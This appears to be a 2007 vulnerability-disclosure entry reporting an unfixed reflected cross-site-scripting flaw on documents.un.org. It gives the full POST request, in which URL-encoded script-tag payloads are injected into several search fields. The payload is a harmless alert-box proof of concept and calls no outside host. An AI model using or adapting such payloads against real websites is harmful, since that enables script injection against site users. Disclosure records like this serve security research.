Security researcher WHK, has submitted on 23/08/2007 a cross-site-scripting (XSS) vulnerability affecting documents.un.org, which at the time of submission ranked 3968 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 23/08/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 23/08/2007 |
Date published: 23/08/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: WHK |
Domain: documents.un.org |
Category: XSS |
Pagerank: 3968 |
URL: http://documents.un.org/submit_form.asp |
POST: FSLang=F&ODSQuery_Symbol=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&Truncature=Right&F ullTextSearch=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&D2=FTP&FD=&FM=&FY=&TD=&TM=&TY =&Sort=D&sub=Valider&dbsearch=global.mother&lastevent=simple.search&pagename=simple&target=simple.as p&englishHeader=%28Database+%3D+UNDOC%29+AND+%28Symbol+%3D+scriptalertxssscript*%29+AND+%28Full+Text +search+text+%3D+%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E%22%29&frenchHeader=%28Base +%3D+UNDOC%29+ET+%28cote+%3D+scriptalertxssscript*%29+ET+%28texte+recherch%C3%A9+%3D+%22%3E%3Cscript %3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E%22%29&russianHeader=%28%D0%91%D0%B0%D0%B7%D0%B0+%D0%B4%D0% B0%D0%BD%D0%BD%D1%8B%D1%85+%3D+UNDOC%29+%D0%B8+%28%D0%A3%D1%81%D0%BB%D0%BE%D0%B2%D0%BD%D0%BE%D0%B5+% D0%BE%D0%B1%D0%BE%D0%B7%D0%BD%D0%B0%D1%87%D0%B5%D0%BD%D0%B8%D0%B5+%3D+scriptalertxssscript*%29+%D0%B 8+%28%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D1%82%D0%B5%D0%BA%D1%81%D1%82%D0%B0+%3D+%22%3E%3Cscript%3Ealert %28%2Fxss%2F%29%3B%3C%2Fscript%3E%22%29&arabicHeader=%28%D9%82%D8%A7%D8%B9%D8%AF%D8%A9+%D8%A7%D9%84% D8%A8%D9%8A%D8%A7%D9%86%D8%A7%D8%AA+%3D+UNDOC%29+%D9%88+%28%D8%A7%D9%84%D8%B1%D9%85%D8%B2+%3D+script alertxssscript*%29+%D9%88++%28%D9%86%D8%B5+%D8%A7%D9%84%D8%A8%D8%AD%D8%AB+%3D+%22%3E%3Cscript%3Ealer t%28%2Fxss%2F%29%3B%3C%2Fscript%3E%22%29&spanishHeader=%28Base+de+datos+%3D+UNDOC%29+AND+%28Signatur a+%3D+scriptalertxssscript*%29+AND+%28Texto+buscado+%3D+%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C %2Fscript%3E%22%29&chineseHeader=%28%E6%95%B0%E6%8D%AE%E5%BA%93+%3D+UNDOC%29+%E5%92%8C+%28%E6%96%87% E5%8F%B7+%3D+scriptalertxssscript*%29+%E5%92%8C+%28%E6%90%9C%E7%B4%A2%E6%A1%88%E6%96%87+%3D+%22%3E%3 Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E%22%29&query2=%28%5BA%5D+%3D+ZXWUNDOC%29+AND+%28%5BS %5D+%3D+%22XYWZZscriptalertxssscript*XWZXX%22%29+AND+%28%5BPDF%5D%3D%22%3E%3Cscript%3Ealert%28%2Fxss %2F%29%3B%3C%2Fscript%3E%22%29&langchoice=&Plang=F |
Click here to view the mirror
|
|
|